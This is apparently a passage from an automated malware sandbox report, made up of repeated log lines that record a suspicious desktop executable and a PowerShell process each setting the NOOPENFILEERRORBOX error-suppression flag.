                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
